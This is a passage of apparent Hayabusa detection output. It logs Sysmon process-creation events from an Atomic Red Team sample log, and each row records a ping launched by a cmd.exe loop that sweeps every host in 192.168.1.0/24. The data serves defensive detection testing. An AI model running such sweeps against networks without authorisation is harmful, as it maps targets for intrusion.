+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.34 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:52.008 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.35 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:52.448 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.36 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:53.019 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.37 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:53.546 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.38 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:54.036 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.39 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:54.581 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.40 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:55.015 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.41 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:55.552 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.42 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:56.049 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.43 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:56.534 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.44 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:57.034 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.45 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:57.558 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.46 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:58.020 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.47 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:58.457 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.48 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:59.001 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.49 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:59.537 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.50 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:00.063 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.51 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:00.515 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.52 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:00.940 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.53 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:01.546 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.54 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:02.018 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.55 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:02.565 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.56 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:03.059 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.57 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:03.520 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.58 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:04.024 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.59 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:04.522 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.60 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:05.036 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.61 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:05.516 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.62 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:06.019 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.63 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:06.440 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.64 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:07.053 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.65 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:07.413 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.66 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:08.043 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.67 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:08.500 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.68 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:09.012 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.69 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:09.474 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.70 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:10.014 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.71 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:10.522 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.72 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:11.031 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.73 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:11.504 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.74 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:12.023 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.75 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:12.547 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.76 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:13.030 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.77 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:13.489 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.78 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:14.036 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.79 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:14.552 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.80 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:15.051 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.81 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:15.548 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.82 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:16.040 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.83 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:16.584 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.84 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:17.041 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.85 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:17.511 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.86 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:18.015 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.87 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:18.509 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.88 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:18.990 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.89 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping 